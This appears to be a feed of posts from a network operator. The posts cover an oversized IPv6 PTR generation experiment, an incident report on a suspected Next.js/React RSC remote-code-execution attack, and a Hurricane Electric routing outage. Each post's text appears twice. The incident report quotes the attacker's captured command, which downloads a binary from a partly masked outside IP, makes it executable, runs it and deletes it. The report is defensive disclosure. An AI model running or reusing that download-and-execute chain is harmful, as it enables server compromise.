今日维修wtfdns.com的权威DNS,同时将我自己的IPv4和IPv6段的PTR迁移回家。
—
维修的时候想着既然IPv4 PTR可以预生成所有IP的PTR,那为什么不能预生成IPv6的呢,遂修改PTR生成脚本,并尝试生成一段/40的PTR和AAAA记录
—
当我发现我使用PTR生成器生成了10多分钟的IPv6 PTR我才想起有什么不对劲,此时系统盘已经差点被塞满了
—
稍微算了一下发现这接近100G的PTR大概是可以算≈0%了,按100B一条记录来估算的话,整段/40的PTR需要30多ZB才可以写完
—
同样是PTR,也是按100B来算,IPv4从0.0.0.0~255.255.255.255,占用大概只要半个TB,IPv6的数量在此刻具象化了,IPv4的数量完全是玩具级规模
—
维修的时候想着既然IPv4 PTR可以预生成所有IP的PTR,那为什么不能预生成IPv6的呢,遂修改PTR生成脚本,并尝试生成一段/40的PTR和AAAA记录
—
当我发现我使用PTR生成器生成了10多分钟的IPv6 PTR我才想起有什么不对劲,此时系统盘已经差点被塞满了
—
稍微算了一下发现这接近100G的PTR大概是可以算≈0%了,按100B一条记录来估算的话,整段/40的PTR需要30多ZB才可以写完
—
同样是PTR,也是按100B来算,IPv4从0.0.0.0~255.255.255.255,占用大概只要半个TB,IPv6的数量在此刻具象化了,IPv4的数量完全是玩具级规模
🤯4🤣2
今日晚间,我们 STE Network 在阿里云的边缘节点由阿里云Agent检测到一次疑似 RCE 攻击行为。
—
根据阿里云 Agent 的告警与我们的初步分析,攻击特征高度疑似与近期公开的
Next.js / React RSC 远程代码执行漏洞(CVE-2025-55182 / CVE-2025-66478)
相关,但我们仍在进行进一步核实,因此暂不做最终定论
——
流程分析:
攻击者通过 Next.js 的服务器函数接口向系统投递并执行了恶意可执行文件,其利用链如下
/bin/sh -c wget http://45.76.xx.xx/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & wait ; \
rm -f /tmp/vim
—
由阿里云Agent捕获的进程链如下
containerd-shim
└─ node yarn start-docker
└─ node npm-run-all start-server
└─ next-server v15.0.4
└─ /bin/sh -c wget http://45.76.xx.xx/vim
—
该命令链表明攻击者已成功在 Next.js 运行环境内部执行系统命令,确认存在实际的命令执行行为
——
当前攻击发生在应用容器内部,说明攻击链能够突破Web层并触达系统命令执行路径
-
我们已在第一时间隔离受影响节点,并进行镜像替换与版本升级
-
尚未发现横向移动或进一步扩大的迹象
——
根据目前社区和安全圈公开的技术细节,Next.js / React RSC 相关漏洞利用门槛较低,风险等级极高
-
建议所有使用 Next.js / React 的开发者与平台运营者尽快升级到官方最新版本
—
根据阿里云 Agent 的告警与我们的初步分析,攻击特征高度疑似与近期公开的
Next.js / React RSC 远程代码执行漏洞(CVE-2025-55182 / CVE-2025-66478)
相关,但我们仍在进行进一步核实,因此暂不做最终定论
——
流程分析:
攻击者通过 Next.js 的服务器函数接口向系统投递并执行了恶意可执行文件,其利用链如下
/bin/sh -c wget http://45.76.xx.xx/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & wait ; \
rm -f /tmp/vim
—
由阿里云Agent捕获的进程链如下
containerd-shim
└─ node yarn start-docker
└─ node npm-run-all start-server
└─ next-server v15.0.4
└─ /bin/sh -c wget http://45.76.xx.xx/vim
—
该命令链表明攻击者已成功在 Next.js 运行环境内部执行系统命令,确认存在实际的命令执行行为
——
当前攻击发生在应用容器内部,说明攻击链能够突破Web层并触达系统命令执行路径
-
我们已在第一时间隔离受影响节点,并进行镜像替换与版本升级
-
尚未发现横向移动或进一步扩大的迹象
——
根据目前社区和安全圈公开的技术细节,Next.js / React RSC 相关漏洞利用门槛较低,风险等级极高
-
建议所有使用 Next.js / React 的开发者与平台运营者尽快升级到官方最新版本
🤯4
快报,(影响范围:除CN-Mainland以外的地区)
---
IPv6 Tier1,IPv4 Tier2 运营商AS6939 (Hurricane Electric)
的骨干网出现一些问题,导致你服某些境外节点使用IPv4单线6939作为上游的服务器/节点的路由的会出现不可达
---
但是因为IPv6由于AS174和AS6939两家的历史问题,我们没有单线6939的IPv6,我的服务商也没有单线6939,因此IPv6服务肯定正常
不是我的问题,也不是你的问题,等待修复好了
---
我们和AS6939的PEER会话正常收到对方的IP Route表,但所有发来的前缀皆不可达
---
IPv6 Tier1,IPv4 Tier2 运营商AS6939 (Hurricane Electric)
的骨干网出现一些问题,导致你服某些境外节点使用IPv4单线6939作为上游的服务器/节点的路由的会出现不可达
---
但是因为IPv6由于AS174和AS6939两家的历史问题,我们没有单线6939的IPv6,我的服务商也没有单线6939,因此IPv6服务肯定正常
不是我的问题,也不是你的问题,等待修复好了
---
我们和AS6939的PEER会话正常收到对方的IP Route表,但所有发来的前缀皆不可达